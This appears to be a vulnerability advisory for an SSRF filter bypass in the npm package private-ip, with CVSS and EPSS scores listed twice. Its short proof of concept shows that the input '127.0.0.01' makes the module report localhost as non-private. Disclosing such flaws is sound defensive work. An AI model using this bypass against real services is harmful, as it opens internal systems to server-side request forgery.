Payloadartist1-NPM-PRIVATE-IPServer-Side Request Forgery (SSRF) in frenchbread/private-ip
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.007 Low
EPSS
Percentile
77.7%
✍️ Description
Private-ip is an NPM module that is used to check if the input IP address is private or not, so as to prevent SSRF attacks. It has ~12k downloads every week on NPM
However, I found that by crafting a malicious IP, an attacker can easily bypass this check.
🕵️♂️ Proof of Concept
First test case - 127.0.0.1, the application returns true and is able to determine it’s a private IP:
var privateIp = require("private-ip")
console.log('Testing 127.0.0.1')
require('private-ip')('127.0.0.1');
Bypass - 127.0.0.01, by adding a ‘0’ to the the 4th octet for example can bypass this, and it would return false thus bypassing the filter/regex (if you ping 127.0.0.01, it resolves to 127.0.0.1 i.e. localhost)
var privateIp = require("private-ip")
console.log('Testing 127.0.0.01')
require('private-ip')('127.0.0.01'); // returns false
💥 Impact
It can be used to bypass SSRF filters wherever this NPM module is used to prevent SSRF.
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.007 Low
EPSS
Percentile
77.7%